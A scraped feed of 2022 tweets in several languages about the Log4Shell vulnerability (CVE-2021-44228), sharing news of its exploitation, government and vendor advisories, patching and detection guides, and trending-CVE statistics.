2022-11-29 13:00:341. Follina(CVE-2022-30190) 2. Log4Shell(CVE-2021-44228) 3. Spring4Shell(CVE-2022-22965) 4. F5 BIG-IP(CVE-2022-1388)… https://t.co/vz38YHvq28 https://twitter.com/i/web/status/1597571635292536832n0ipr0cs
2022-11-28 12:33:561. Follina (CVE-2022-30190) 2. Log4Shell (CVE-2021-44228) 3. Spring4Shell (CVE-2022-22965)thebinarybot
2022-11-28 08:45:28How to Detect CVE-2021-44228 Log4Shell Vulnerability in Your Server? #cybersecurity #infosec #vulnerability… https://t.co/biaOiVKDPJ https://twitter.com/i/web/status/1597145852367097856TheSecMaster1
2022-11-23 14:10:45Securing K8s clusters for Log4j CVE-2021-44228 Read full article - https://t.co/DFeCjlF2Il Join Knowasiak for fre… https://t.co/oN67FWfiMX https://www.knowasiak.com/?p=918918&utm_source=SocialAutoPoster&utm_medium=Social&utm_campaign=Twitter https://twitter.com/i/web/status/1595417101237628930adityagauravkc
2022-11-23 10:32:53Exploitation of #CVE-2021-44228 (#log4shell) on Unifi Network Application. Delivering #XMRig miner #DFIR Ubiquiti… https://t.co/t1fOcYlz9N https://twitter.com/i/web/status/1595361844956471300osipov_ar
2022-11-22 14:51:16“Log4Shell” (CVE-2021-44228, CVE-2021-45046 e correlate): secondo alert @csirt_it nel giro di circa 4 mesi. 🔹… https://t.co/YLDMzYmaYj https://twitter.com/i/web/status/1595066328460972034sonoclaudio
2022-11-22 06:20:21Fletch Top Threat Alert: #CVE-2021-44228 - Not patched Log4j yet? Assume attackers are in your network, say CISA an… https://t.co/C5JCvkxfJw https://twitter.com/i/web/status/1594938488176402432fletch_ai
2022-11-21 14:15:09CISA Log4j (CVE-2021-44228) Vulnerability Guidance Read full article - https://t.co/7pdR1SLS3t Join Knowasiak for… https://t.co/mr4EA2Hp8p https://www.knowasiak.com/?p=914949&utm_source=SocialAutoPoster&utm_medium=Social&utm_campaign=Twitter https://twitter.com/i/web/status/1594692205595176960adityagauravkc
2022-11-21 07:31:48漏洞复现——CVE-2021-44228 https://t.co/qwfoWz9hhw https://t.co/eX43WUSFuW https://ift.tt/01oMrbm https://ift.tt/QJYbn0Sbuaqbot
2022-11-21 00:00:52過去投稿 #Azure WAFでlog4jの脆弱性(CVE-2021-44228)対策をしてみる。 https://t.co/BO1GAFV1xr https://level69.net/archives/28320?utm_source=ReviveOldPost&utm_medium=social&utm_campaign=ReviveOldPostjkudo
2022-11-18 18:33:57La vulnerabilidad se clasifica como CVE-2021-44228 (log4Shell). Es una vulnerabilidad de día cero en Log4j, un po… https://t.co/Sb26bvbmwS https://twitter.com/i/web/status/1593671632249405440CycuraMX
2022-11-17 05:24:04さまざまなプログラムに使われているJavaのログ出力ライブラリに「Log4Shell(CVE-2021-44228)」という脆弱(ぜいじゃく)性が発覚してから、仮想通貨マイニングやデータ盗難などが多発したり、政府系ハッキンググルー… https://t.co/7xCrUOpHts https://twitter.com/i/web/status/1593104411643240448themoneymoney
2022-11-17 04:41:47さまざまなプログラムに使われているJavaのログ出力ライブラリに「Log4Shell(CVE-2021-44228)」という脆弱(ぜいじゃく)性が発覚してから、仮想通貨マイニングやデータ盗難などが多発したり、政府系ハッキンググルー… https://t.co/7HKftJXldz https://twitter.com/i/web/status/1593100697041797121Levorg_Z
2022-11-17 00:09:27US govt: Hackers breached federal agency using Log4Shell exploit (CVE-2021-44228) https://t.co/5MOBEj77zn https://www.bleepingcomputer.com/news/security/us-govt-iranian-hackers-breached-federal-agency-using-log4shell-exploit/TexasCyberConf
2022-11-15 00:16:42過去投稿 Alibaba Cloud でのLog4jの脆弱性(CVE-2021-44228)の対応について https://t.co/gcauOsxa5t #alibabacloud https://level69.net/archives/28335?utm_source=ReviveOldPost&utm_medium=social&utm_campaign=ReviveOldPostjkudo
2022-11-06 03:00:10Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228) | CVE-2021-44228(Apache Log4j Remote Code Execution) https://t.co/W8cyCD1TD1 https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rcejksm0806
2022-11-02 21:40:25Log4j2 远程代码执行漏洞(CVE-2021-44228)思考 https://t.co/KE2bAO7x6B https://t.co/xMyokeFDNl https://ift.tt/SaNqKte https://ift.tt/NidpwLsbuaqbot
2022-11-01 17:52:50@MongoDB CVE-2021-44228 on all legacy systemsJonathan_Hosea
2022-10-22 21:27:49Was ist Log4Shell? Die als CVE-2021-44228 indizierte Schwachstelle in den Log4j-Versionen 2.0 bis 2.14.1 ist eine… https://t.co/qUS05RLy7g https://twitter.com/i/web/status/1583929476513087488Deutsche_Songs
2022-10-22 00:43:01VMWare vCenter Log4J Workaround | VMSA-2021-0028 | CVE-2021-44228 #cybersecurity #vmware #ach_sysadmin #achubbard… https://t.co/ZHA7X8GKLe https://twitter.com/i/web/status/1583616659948179458sebaenetworks
2022-10-22 00:10:33@nomizooone 読み手: CVE-2021-44228 取り手:Log4j!yskmerlion
2022-10-21 05:08:13Log4Shell/CVE-2021-44228 https://t.co/HfM3xyNtEu https://help.bevy.com/hc/en-us/articles/4418886550551-Log4Shell-CVE-2021-44228thanuwat1314
2022-10-16 12:56:16java: Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた - piyolog https://t.co/VOYemMKpcH https://piyolog.hatenadiary.jp/entry/2021/12/13/045541RSS_hateb_l_Roy
2022-10-10 08:14:53Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた https://t.co/MB5uw3jTK9 https://piyolog.hatenadiary.jp/entry/2021/12/13/045541housu_jp
2022-10-10 08:14:31Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 https://t.co/VrQVrVaOGl https://blogs.jpcert.or.jp/ja/2021/12/log4j-cve-2021-44228.htmlhousu_jp
2022-10-07 07:42:52🗒米当局、中国のハッカーが好んで狙う脆弱性トップ20をリストアップ(CVE-2021-44228ほか) ⚠️LilithBotマルウェア:Eternity Groupが提供する新たなMaaS 🚨VPNアプリ装うAndroid… https://t.co/znyWePR8PW https://twitter.com/i/web/status/1578288927508602881MachinaRecord
2022-10-06 20:10:48CVE-2021-44228, better known as the Log4Shell vulnerability in the Log4j 2 framework, is at the top of the list. (A… https://t.co/0SXNqyf38V https://twitter.com/i/web/status/1578114265986334725README_Security
2022-10-06 03:29:54🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/0SZSxVtKqp https://twitter.com/i/web/status/1577859233072271364threatintelctr
2022-10-04 15:52:53Is your WAF still relying on regex for detecting Log4Shell / CVE-2021-44228? Today I'm excited to announce the gene… https://t.co/KzIqfj85YG https://twitter.com/i/web/status/1577323574200762369DanielCorbett_
2022-10-02 13:33:23今は懐かしきCVE-2021-44228 https://t.co/ewy76V7I5qZakki0925224
2022-09-28 18:05:03@CitadelArcho CVE-2021-44228 - I'm everywhere, even places you don't expect, and I run on javawillbenem
2022-09-27 16:22:33Apache Log4j utility zero-day exploit (CVE-2021-44228) and (CVE 2021-45046) https://t.co/qiuC0GKWJa http://dnray.com/vulnerabilities/apache-log4j-utility-zero-day-exploit-cve-2021-44228-and-cve-2021-45046/#.YzMfBdZp7HU.twitterseomasteringcom
2022-09-26 11:20:15@AlekVonGlark @JajadingdongFR ouais ouais, CVE-2021-44228 c'est des devs C#rw_chps
2022-09-24 09:22:17@jbowocky I would love to see CVE-2021-44228 as someone's spooky costume. I give it a 30% change to get a ping back 😅von_Georgi
2022-09-14 21:55:18Log4Shell (CVE-2021-44228) is bad, but that doesn’t mean everything is bad. Even F5 Labs’ resident pessimist thinks… https://t.co/hM2uCMj8JH https://twitter.com/i/web/status/1570166556419571715Ievgeniy5
2022-09-14 20:02:56@Virdoex_hunter @ChangeNOW_io they don't even update their library on some services 🤡 CVE-2021-44228ertugrulphp
2022-09-12 21:20:33#Log4J: Exploit for Expression Language Injection in Apache CVE-2021-44228 Source: https://t.co/gopQQFfEnz… https://t.co/iGmaORH1JN https://sploitus.com/exploit?id=94A8FFF1-6A48-57CB-9340-D6806F47EFA0 https://twitter.com/i/web/status/1569434028087906305FragmentedSoul5
2022-09-11 20:50:05朝っぱらから CVE-2021-44228の攻撃ログが届いて アラートで起こされる 8080だから完全に7daystodie開いているから攻撃してきたんだろが Minecraftとかより全然7daysやってる時の方が外部からアクセ… https://t.co/v4rb4Eyr9K https://twitter.com/i/web/status/1569061366140653570Farrell_FF14
2022-09-01 21:23:57If you know what CVE-2021-44228 is... Lets chat...SparksTheFolf
2022-08-30 18:30:37@Microsoft More recently is Log4j or CVE-2021-44228. The Apache Log4j utility was vulnerable to remote code executi… https://t.co/BECw8lMhYc https://twitter.com/i/web/status/1564681860852097027ArchinalLee
2022-08-29 14:51:31🚨 NEW: CVE-2021-4125 🚨 It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenSh… https://t.co/ykLlA9eWM8 https://twitter.com/i/web/status/1564262133386383361threatintelctr
2022-08-28 08:00:49Log4J vulnerability has been named CVE-2021-44228, and it exploits a protocol called JNDI. Java’s JNDI protocol ena… https://t.co/hMAG0WHT1G https://twitter.com/i/web/status/1563796449103675392Red_Entry_
2022-08-26 12:00:11log4shellだと、CVE-2021-44228が悪用する攻撃活動が観測され始めたのが12/10(報告は11/24)で、NVDのCPE configuration に初めて登録されたのが、12/13なので、早期警告できるように… https://t.co/gpT4k0TCWF https://twitter.com/i/web/status/1563130234244698118MaineK00n
2022-08-26 10:31:51I just summarised some findings about Oracle Unified Directory and #Log4j CVE-2021-44228 in a blog post.… https://t.co/cfx6mOY5pc https://twitter.com/i/web/status/1563109273969709057stefanoehrli
2022-08-25 18:23:58Rough overview via @shodanhq of how widely used the SysAid system MERCURY is targeting via Log4Shell/CVE-2021-44228… https://t.co/yP3A7zgVsP https://twitter.com/i/web/status/1562866112689123328BushidoToken
2022-08-25 08:17:32@theXSSrat CVE-2021-44228! Log4j of course!Special_K_Anon
2022-08-25 07:21:16CVE-2021-4125 It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift meter… https://t.co/tySaKr42fU https://twitter.com/i/web/status/1562698691332689920threatmeter
2022-08-25 07:17:56Emerging Vulnerability Found CVE-2021-4125 - It was found that the original fix for log4j CVE-2021-44228 and CVE-20… https://t.co/d2q0ZMfQtt https://twitter.com/i/web/status/1562698718390153217ColorTokensInc
2022-08-25 07:17:09Emerging Vulnerability Found CVE-2021-45046 - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2… https://t.co/rAKiPyQdE4 https://twitter.com/i/web/status/1562698720977641472ColorTokensInc
2022-08-24 17:51:03CVE-2021-4125 It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift meter… https://t.co/Ota4hXdT39 https://twitter.com/i/web/status/1562496297088610304CVEnew
2022-08-24 17:22:26🚨 NEW: CVE-2021-4125 🚨 It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenSh… https://t.co/r3DBYdUeZj https://twitter.com/i/web/status/1562487941636599808threatintelctr
2022-08-24 17:00:37🚨 NEW: CVE-2021-4125 🚨 It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenSh… https://t.co/FbxzPkKkXt https://twitter.com/i/web/status/1562480391545831425threatintelctr
2022-08-24 16:35:01CVE-2021-4125 : It was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift met… https://t.co/oIdchNpYt4 https://twitter.com/i/web/status/1562472313375059970CVEreport
2022-08-19 18:56:37Day (16/100): ✅ Learned to exploit Java RCE Vulnerabilities. Learned to exploit the Log4Shell: CVE-2021-44228 vuln… https://t.co/kzVGUhRTGB https://twitter.com/i/web/status/1560698326294708226BroodaShah
2022-08-19 18:40:31Cybereason released a tool which aimed to use Log4Shell CVE-2021-44228 to patch Log4Shell: https://t.co/5eESPSVA3G… https://t.co/TdihsZiqnm https://github.com/Cybereason/Logout4Shell https://twitter.com/i/web/status/1560697161955901441dreadpir8robots
2022-08-19 14:09:57log4j-finder: Find vulnerable Log4j2 versions on disk and also inside Java Archive Files (Log4Shell CVE-2021-44228,… https://t.co/iRQvibYjch https://twitter.com/i/web/status/1560622623020777472CyberWarship
2022-08-18 21:50:28#GitHub's response to Log4j vulnerability CVE-2021-44228 https://t.co/MagcPNsRDb #CyberSecurity #TechJunkieNews https://t.co/hCdYhjuJzw https://bit.ly/3m3UWeOtechjunkiejh
2022-08-17 18:26:31🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/pwdzxYkY5h https://twitter.com/i/web/status/1559966323748360192threatintelctr
2022-08-17 16:06:30Day 41 of #100DaysOfCode // #100DaysOfHacking Well well CVE-2021-44228  is 🔥 7+ Challanges in C programming (lol… https://t.co/UAi8ypNk6E https://twitter.com/i/web/status/1559931356989177857FreyJST
2022-08-16 12:00:34過去投稿 Alibaba Cloud でのLog4jの脆弱性(CVE-2021-44228)の対応について https://t.co/gcauOsxa5t #alibabacloud https://level69.net/archives/28335?utm_source=ReviveOldPost&utm_medium=social&utm_campaign=ReviveOldPostjkudo
2022-08-15 21:27:12https://t.co/MxXUCPPZhF Providing On-Demand Testing for CVE-2021-44228 (Log4j) with Synack Testing #cybersecurity https://www.synack.com/blog/providing-on-demand-testing-for-log4j/netsecu
2022-08-15 13:11:04Top Twenty Most Exploited Vulnerabilities in 2021 1 – CVE-2021-44228 2 – CVE-2021-4034 3 – CVE-2021-41773 4 – CVE-2… https://t.co/VmTURcbAwo https://twitter.com/i/web/status/1559164916421894144Dax_Scholtz
2022-08-14 06:40:04I really had CVE-2021-45105, CVE-2021-45046 and CVE-2021-44228 🤑 #Log4ShellIog4j
2022-08-13 10:14:15Security Bulletin: Vulnerability in Apache Log4j affects IBM InfoSphere Master Data Management (CVE-2021-44228 ) https://t.co/8fvTT2X9gJ https://ift.tt/sN8VaBGmicsieg
2022-08-13 09:58:53Security Bulletin: Vulnerability in Apache Log4j affects IBM InfoSphere Master Data Management (CVE-2021-44228 ) https://t.co/8fvTT2X9gJ https://ift.tt/sN8VaBGmicsieg
2022-08-13 09:35:57Security Bulletin: Vulnerability in Apache Log4j affects IBM InfoSphere Master Data Management (CVE-2021-44228 ) https://t.co/8fvTT2X9gJ https://ift.tt/sN8VaBGmicsieg
2022-08-09 09:58:07.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/erffb3N9r4 https://twitter.com/i/web/status/1556939375115632640Woronka
2022-08-09 08:50:56An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/StXBpL7dpT https://twitter.com/i/web/status/1556925339758215168ProductCERT
2022-08-08 19:30:09fresh #Log4Shell (CVE-2021-44228) catch by the honeynet #infosec #CyberSecurity #ThreatHunting #ThreatIntelligence https://t.co/XI8g7qfpWQhackermill
2022-08-06 19:30:08Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 #cybersecurity #awareness #vulnerability… https://t.co/uZVqYLm1WM https://twitter.com/i/web/status/1555997927784546306hintz2010
2022-08-03 18:50:28🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/3adCVfuGJE https://twitter.com/i/web/status/1554900441405726721threatintelctr
2022-08-03 13:50:25CVE-2021-44228 makes the list as one of the vulnerabilities exploited for initial access in Karakurt events - https://t.co/ORu05gadLY https://www.cisa.gov/uscert/ncas/alerts/aa22-152aTheIanMay
2022-07-29 02:14:16Security Bulletin: Apache Log4j (CVE-2021-44228) vulnerability in IBM Engineering Systems Design Rhapsody (Rhapsody… https://t.co/TjTtBqT5lE https://twitter.com/i/web/status/1552836320539582467Bobe_bot
2022-07-26 22:20:09Apache Apereo CAS Log4Shell Direct Check (CVE-2021-44228) https://t.co/QdlorYYeJJ https://ift.tt/YWPV042cc_cyberdefence
2022-07-26 21:52:13#Apache Apereo CAS Log4Shell Direct Check (CVE-2021-44228) https://t.co/JPiPe7IlAP #Nessus https://www.tenable.com/plugins/nessus/163453SecurityNewsbot
2022-07-25 12:00:12過去投稿 #Azure WAFでlog4jの脆弱性(CVE-2021-44228)対策をしてみる。 https://t.co/BO1GAFV1xr https://level69.net/archives/28320?utm_source=ReviveOldPost&utm_medium=social&utm_campaign=ReviveOldPostjkudo
2022-07-22 19:00:00🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/5mmbzlCrOM https://twitter.com/i/web/status/1550552079139217413threatintelctr
2022-07-22 16:20:42Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた - piyolog https://t.co/MefVnIomsE https://piyolog.hatenadiary.jp/entry/2021/12/13/045541d4te_kun
2022-07-22 06:53:35🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/zd13ApKrQo https://twitter.com/i/web/status/1550370881863548928threatintelctr
2022-07-20 16:14:04Cyber actors continue to exploit Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon Systems (updated with n… https://t.co/CGKJOpT2Zm https://twitter.com/i/web/status/1549786530260058114securezoo
2022-07-20 14:14:41The Cyber Safety Review Board (CSRB) labeled Log4j (CVE-2021-44228) as an “endemic vulnerability” and said that vul… https://t.co/XL2krwZCuL https://twitter.com/i/web/status/1549756028211822597MEDHOSTinc
2022-07-18 19:10:22In its first-ever report, the Cyber Safety Review Board labeled Log4j (CVE-2021-44228) as an “endemic… https://t.co/bSczXdcsaZ https://twitter.com/i/web/status/1549106952789037056AnacompInc
2022-07-18 17:50:43"Vulnerabilit� CVE-2021-44228, Log4J 2 / Log4Shell Security Advisory for Notes, Domino, Verse, and Traveler e Conne… https://t.co/ItcYnKSzLb https://twitter.com/i/web/status/1549088118812209152dominopoint
2022-07-18 03:30:09Dirty Pipe: CVE-2022-0847 https://t.co/WSDK3D1sWc CVE-2021-44228 (log4j) https://t.co/8ceEtvQYj6 Pwnkit: CVE-2021… https://t.co/tlfDEup1cv https://dirtypipe.cm4all.com/ https://tryhackme.com/room/solar https://twitter.com/i/web/status/1548871061932019714rootsecdev
2022-07-17 19:52:22The initial vulnerability in Log4j is known as CVE-2021-44228. It was first reported to the Apache Software Foundat… https://t.co/VSU3150ZLW https://twitter.com/i/web/status/1548754520280367104necpeceth
2022-07-16 01:31:36#GitHub's response to Log4j vulnerability CVE-2021-44228 https://t.co/MagcPNbgeB #CyberSecurity #TechJunkieNews https://t.co/hEZh1Dt2Rq https://bit.ly/3m3UWeOtechjunkiejh
2022-07-15 16:28:59minecraft died when they removed the CVE-2021-44228 featurefuckervescent
2022-07-14 23:55:42Log4Shell (CVE-2021-44228) was a zero-day vulnerability in Log4j, a popular Java logging framework, involving arbit… https://t.co/ah1Pt57QRT https://twitter.com/i/web/status/1547728764053794818JohnKI7YRA
2022-07-14 17:01:40#Log4Shell (CVE-2021-44228) – what you need to know! Here's a high-level summary of what Log4Shell is, how it ope… https://t.co/zHUAGCGtel https://twitter.com/i/web/status/1547626307923484675GuyCaspi
2022-07-13 20:11:09#Log4Shell (CVE-2021-44228) – what you need to know! Find out a high-level summary of what Log4Shell is, how it op… https://t.co/P1NW3bYgrZ https://twitter.com/i/web/status/1547311218804801536DeepInstinctSec
2022-07-13 13:10:21It's been half a year since #Log4Shell broke. Our latest post details how common CVE-2021-44228 still is and how ea… https://t.co/lEItiXnDmz https://twitter.com/i/web/status/1547204409486082048Horizon3Attack
2022-07-11 14:30:40“Log4Shell Simplified : All you need to know about CVE-2021-44228” by Nishith K https://t.co/Otrt77TwjX https://t.co/8mWaFz5XOe https://link.medium.com/fzQtKzYSzrbAlra3ees
2022-07-07 00:00:13Does CVE-2021-44228 impact Log4j ports? - Visit https://t.co/MAReXjKXQU for the answer. #vulnerability #log4shell #infosec #development #dev https://programmatic.solutions/m8kvda/does-cve-2021-44228-impact-log4j-portsProgrammatoris
2022-07-05 18:10:22Learn how #APT actors exploited #Log4Shell #RCE vulnerability #CVE-2021-44228 in #VMware Horizon and #UAG to move l… https://t.co/LpXCdBQCnK https://twitter.com/i/web/status/1544382678690140160logichubhq
2022-06-30 18:50:46🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3… https://t.co/mgNvGyoBNY https://twitter.com/i/web/status/1542579541574565888threatintelctr
2022-06-30 17:10:11#SecurityNews #TRISW66 Log4Shell (CVE-2021-44228) https://t.co/TJezb8PG82 https://t.co/UpSn3IKGAJ… https://t.co/5rIOLUOSaz https://lnkd.in/g7yyrncR https://lnkd.in/getSTZJY https://twitter.com/i/web/status/1542554045704851456toperzak
2022-06-30 15:10:15@CISA warned that bad actors are exploiting CVE-2021-44228 on unpatched, public-facing VMware Horizon and UAG serve… https://t.co/TwiWiGZRmZ https://twitter.com/i/web/status/1542525147256705024TrinityCyber
2022-06-29 06:10:35Update for advisory OBS02112-01 (log4shell /CVE-2021-44228) published: check change history for updates. https://t.co/Fhacf6OQnF #obso https://networks.unify.com/security/advisories/OBSO-2112-01.pdfUnifyCoSecurity
2022-06-28 14:12:17Threat Intelligence and Protections Update Log4Shell CVE-2021-44228 https://t.co/iUnAkLXjrJ https://newsaxes.com/menace-intelligence-and-protections-replace-log4shell-cve-2021-44228-2/newsaxes
2022-06-27 15:10:23CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-06-27 13:13:45Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 333.7K (audience size) CVE-2021-21551: 242.4K CVE-2022… https://t.co/CW537A2DJp https://twitter.com/i/web/status/1541406000615489536CVEtrends
2022-06-27 13:10:27Running VMware Horizon or Unified Access Gateway (UAG) servers that aren't patched for Log4Shell (CVE-2021-44228),… https://t.co/3cINEKJHHI https://twitter.com/i/web/status/1541407916846194688ErichKron
2022-06-26 23:10:04Log4Shell – Exploiting a Critical Remote Code Execution Vulnerability in Apache Log4j (CVE-2021-44228)… https://t.co/HUSMNoFyRf https://twitter.com/i/web/status/1541195909110939650ChiNetworks
2022-06-26 17:50:08#ICYMI – We published technical details &amp; mitigation steps on cyber threat actors exploiting the CVE-2021-44228 (Lo… https://t.co/BghxWFYL81 https://twitter.com/i/web/status/1541115076660322310CISAgov
2022-06-25 13:10:06Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 287.2K (audience size) CVE-2022-26134: 199.6K CVE-2022… https://t.co/N2fEVIDoh1 https://twitter.com/i/web/status/1540681226087870465CVEtrends
2022-06-24 23:40:17Cyber actors continue to exploit Log4Shell vulnerability (CVE-2021-44228) in VMware Horizon Systems… https://t.co/9wulCcli1Z https://twitter.com/i/web/status/1540478747081572353securezoo
2022-06-24 21:00:19"Nation state APT groups continue targeting the Log4Shell (CVE-2021-44228) vulnerability to gain unauthorized acces… https://t.co/2wQt8sE7Nl https://twitter.com/i/web/status/1540439531450671106safebreach
2022-06-24 17:22:48📣 تحذير من استغلال لثغرة CVE-2021-44228 او #log4Shell من قبل المهاجمين المتقدمين وذلك بهدف تنفيذ تعليمات برمجية ضار… https://t.co/hbn2aQTHwI https://twitter.com/i/web/status/1540379369906257920Cyber_Cave_sa
2022-06-24 17:01:11#CISA warns about active exploitation of a critical vulnerability in the wild CVE-2021-44228 to deliver and upload… https://t.co/f2aBehb6IO https://twitter.com/i/web/status/1540378970889359361Cyber_Cave_sa
2022-06-24 13:00:24Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-30983: 529.3K (audience size) CVE-2021-44228: 415.8K CVE-2022… https://t.co/3rqMu9YGHx https://twitter.com/i/web/status/1540318838235045891CVEtrends
2022-06-24 11:50:43US Agencies Warn Organizations of Log4Shell Attacks Against VMware ... (Securityweek) Tracked as CVE-2021-44228, t… https://t.co/1I02SqNo7H https://twitter.com/i/web/status/1540298759904432130PrivacyPro_b
2022-06-24 11:50:34US Agencies Warn Organizations of Log4Shell Attacks Against VMware ... (Securityweek) Tracked as CVE-2021-44228, t… https://t.co/QacoTJJxMc https://twitter.com/i/web/status/1540298765063450624InfoSec_b
2022-06-23 19:00:11Cyber threat actors continue to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (U… https://t.co/0GUAWtn4mT https://twitter.com/i/web/status/1540046425878323200CISAgov
2022-06-17 01:50:28Ese se llamaba  log4j-cve-2021-44228-hotpatch y pretendía combatir la CVE-2021-44228 o log4shell, pero surtió un ef… https://t.co/xTDlEt1taT https://twitter.com/i/web/status/1537611490345222147ing_juani7a
2022-06-14 09:55:43.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/zAqRslFRJB https://twitter.com/i/web/status/1536645659566153731Woronka
2022-06-14 09:00:24An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/rIY8FUEtoY https://twitter.com/i/web/status/1536633569585635328ProductCERT
2022-06-11 08:50:08#GitHub's response to Log4j vulnerability CVE-2021-44228 https://t.co/MagcPNsRDb #CyberSecurity #TechJunkieNews https://t.co/y3FAH7iGxn https://bit.ly/3m3UWeOtechjunkiejh
2022-06-10 23:00:09My workgroup's final group project, exploiting CVE-2021-44228 on a Linux Server running Apache Tomcat &amp; Struts2 for… https://t.co/oiqRrw3O8W https://twitter.com/i/web/status/1535395183101108225mtlmac
2022-06-06 23:40:32#GitHub's response to Log4j vulnerability CVE-2021-44228 https://t.co/MagcPNsRDb #CyberSecurity #TechJunkieNews https://t.co/fB2hVbfm2F https://bit.ly/3m3UWeOtechjunkiejh
2022-06-05 12:50:44#GitHub's response to Log4j vulnerability CVE-2021-44228 https://t.co/MagcPNsRDb #CyberSecurity #TechJunkieNews https://t.co/cBf3efqrk9 https://bit.ly/3m3UWeOtechjunkiejh
2022-06-04 21:40:10#Atlassian #Confleunce RCEs CVE-2022-26134 - OGNL Injection (/ root) CVE-2021-44228 (Log4Shell) CVE-2021-26084 - O… https://t.co/JfVBOYScGZ https://twitter.com/i/web/status/1533201662944354306UK_Daniel_Card
2022-06-04 14:20:26CVE-2022-26134 vs CVE-2021-44228 https://t.co/rlWrBpw5cLUK_Daniel_Card
2022-06-04 01:42:22Everything being scanned for CVE-2021-44228 is probably 12% of the traffic on its own https://t.co/hxZXQ1X8gi https://twitter.com/stats_feed/status/1532427285332013056ScaredCitrus
2022-06-03 12:50:16Contrast this to Log4Shell (CVE-2021-44228), which could be exploited via the internet without any authorization.… https://t.co/HsM6wYjFr0 https://twitter.com/i/web/status/1532701208724619265Walter_Haydock
2022-06-03 09:44:33DEV-0401, a China-based #ransomware attack group, also actively exploited the #Log4j #vulnerability (CVE-2021-44228… https://t.co/FCV0zp1Tzy https://twitter.com/i/web/status/1532656044568190977CswWorks
2022-06-02 14:12:55#GitHub's response to Log4j vulnerability CVE-2021-44228 https://t.co/MagcPNsRDb #CyberSecurity #TechJunkieNews https://t.co/LdaJIW7MUw https://bit.ly/3m3UWeOtechjunkiejh
2022-06-01 16:41:06Bottom line: "Extortion demands up to $13 million" + common method of exploitation = Log4Shell (CVE-2021-44228) https://t.co/nC35Aqnl4l https://lnkd.in/dirxZbSCKateFazzini
2022-05-31 08:50:53hackers están explotando las vulnerabilidades de Apache Log4j ó Log4Shell CVE-2021-44228, es una amenaza important… https://t.co/lAjjjuB2lZ https://twitter.com/i/web/status/1531557652160925696EranErick
2022-05-26 13:13:07VMware has urged customers to apply the latest guidance as a way to resolve vulnerabilities CVE-2021-44228 and CVE-… https://t.co/Q2CMx2vi8g https://twitter.com/i/web/status/1529809702128844800Gurgling_MrD
2022-05-24 14:20:22VMWare vCenter Log4J Workaround | VMSA-2021-0028 | CVE-2021-44228 #cybersecurity #vmware #ach_sysadmin #achubbard… https://t.co/9FrNpbpiiq https://twitter.com/i/web/status/1529102439655297026sebaenetworks
2022-05-23 11:10:18eGreenews Manage the Risks of Software Reuse - 1. “CVE-2021-44228,” Mitre, accessed Dec. 12, 202...egreennews1
2022-05-23 10:10:04North Korea-linked group Lazarus is exploiting the Log4J RCE #vulnerability (CVE-2021-44228) to compromise VMware H… https://t.co/5XgWAsXRRh https://twitter.com/i/web/status/1528678698106376197manuelbissey
2022-05-22 23:10:07北朝鮮関連のAPT集団Lazarusが、VMware Horizonサーバを狙いLog4j脆弱性(CVE-2021-44228)を悪用しているとAhnlab ASEC分析チーム。Log4jからws_tomcatservice.ex… https://t.co/VftxujXuQ4 https://twitter.com/i/web/status/1528512417138737152__kokumoto
2022-05-21 16:10:45performing remote code execution in Apache Log4j (CVE-2021-44228, CVE-2021-45046, CVE-2021-4104). This attack can b… https://t.co/fwcOcmpjmf https://twitter.com/i/web/status/1528043076219977729KiaSoroosh
2022-05-21 00:00:15過去投稿 #Azure WAFでlog4jの脆弱性(CVE-2021-44228)対策をしてみる。 https://t.co/BO1GAFV1xr https://level69.net/archives/28320?utm_source=ReviveOldPost&utm_medium=social&utm_campaign=ReviveOldPostjkudo
2022-05-20 21:50:04#Lazarus is exploiting CVE-2021-44228, aka #Log4Shell, remote code execution vulnerability to inject backdoors that… https://t.co/eVOLGKL6Pn https://twitter.com/i/web/status/1527767873049047041MichaelGouldCRI
